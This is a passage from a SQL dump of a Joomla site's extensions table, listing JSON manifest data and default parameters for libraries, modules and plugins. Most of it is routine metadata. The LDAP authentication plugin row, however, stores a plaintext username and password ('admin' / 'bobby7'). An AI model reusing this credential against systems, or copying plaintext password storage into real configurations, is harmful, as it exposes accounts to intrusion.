reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"https:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"mediaversion\":\"7dadba62e492b516eab8e8e9ec7301fe\"}','','',0,'0000-00-00 00:00:00',0,0),(104,0,'LIB_IDNA','library','idna_convert','',0,1,1,1,'{\"name\":\"LIB_IDNA\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,0,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(106,0,'LIB_PHPASS','library','phpass','',0,1,1,1,'{\"name\":\"LIB_PHPASS\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,0,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,0,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,0,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,0,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,0,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,0,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,0,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,0,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,0,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,0,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,0,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,0,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,0,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,0,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,0,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,0,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,0,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,801,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_weblinks\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,0,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,0,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,0,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,0,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,0,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,0,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_finder\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,0,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,0,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,0,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,0,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,0,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,0,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,0,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,0,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,0,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,0,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,0,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,0,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,0,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,0,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_version\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,0,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,0,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,0,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(318,0,'mod_sampledata','module','mod_sampledata','',1,1,1,0,'{\"name\":\"mod_sampledata\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"MOD_SAMPLEDATA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sampledata\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(319,0,'mod_latestactions','module','mod_latestactions','',1,1,1,0,'{\"name\":\"mod_latestactions\",\"type\":\"module\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_LATESTACTIONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latestactions\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(320,0,'mod_privacy_dashboard','module','mod_privacy_dashboard','',1,1,1,0,'{\"name\":\"mod_privacy_dashboard\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_PRIVACY_DASHBOARD_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_privacy_dashboard\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(400,0,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,0,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,0,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,0,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',1,0),(404,0,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,0,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights 